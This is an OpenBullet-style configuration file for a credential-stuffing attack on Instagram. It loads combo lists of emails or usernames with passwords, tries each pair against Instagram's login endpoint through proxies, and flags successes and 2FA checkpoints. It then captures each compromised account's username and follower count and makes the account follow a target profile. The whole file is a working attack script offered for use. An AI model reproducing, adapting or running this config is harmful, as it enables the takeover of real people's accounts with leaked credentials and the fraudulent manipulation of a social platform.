[SETTINGS]
{
  "CreatorLK": "OB-07fb0125f8c9a1396cee56efb6070bb3-LoliKEY",
  "Name": "Instagram Follow Config",
  "SuggestedBots": 50,
  "LastModified": "2019-04-25T15:21:35.1153431+02:00",
  "AdditionalInfo": "Discord Callz#4158",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Callz",
  "Version": "1.2.2.9 Paradox Mod",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://www.instagram.com/accounts/login/ajax/" 
  CONTENT "username=<USER>&password=<PASS>&queryParams=%7B%7D&optIntoOneTap=false" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: el-GR,el;q=0.9,en;q=0.8" 
  HEADER "content-length: 70" 
  HEADER "origin: https://www.instagram.com" 
  HEADER "referer: https://www.instagram.com/" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" 
  HEADER "x-csrftoken: zhyfnT8y6gosM0V0AeVYG3j4QChtrNzs" 
  HEADER "x-ig-app-id: 936619743392459" 
  HEADER "x-instagram-ajax: ceefc659ad3e" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"authenticated\": true" 
  KEYCHAIN Failure OR 
    KEY "{\"authenticated\": false" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "checkpoint_required" 

PARSE "<COOKIES(csrftoken)>" LR "" "" -> VAR "Cookie" 

#Get_Username REQUEST GET "https://www.instagram.com/accounts/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Username PARSE "<SOURCE>" LR "username\":\"" "\"," -> CAP "USERNAME" 

#Check_Followers REQUEST GET "https://www.instagram.com/<USERNAME>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Followers PARSE "<SOURCE>" LR "Followers, " "Following" -> CAP "Followers" 

#Follow REQUEST POST "https://www.instagram.com/web/friendships/idhere/follow/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://www.instagram.com" 
  HEADER "referer: https://www.instagram.com/XXX/" 
  HEADER "x-csrftoken: <Cookie>" 
  HEADER "x-ig-app-id: 936619743392459" 
  HEADER "x-instagram-ajax: 54a9070d7dcf-hot" 
  HEADER "x-requested-with: XMLHttpRequest" 

#Follow_ok? PARSE "<SOURCE>" LR "\"following\", \"status\": \"" "\"}" -> CAP "FOLLOWED" 

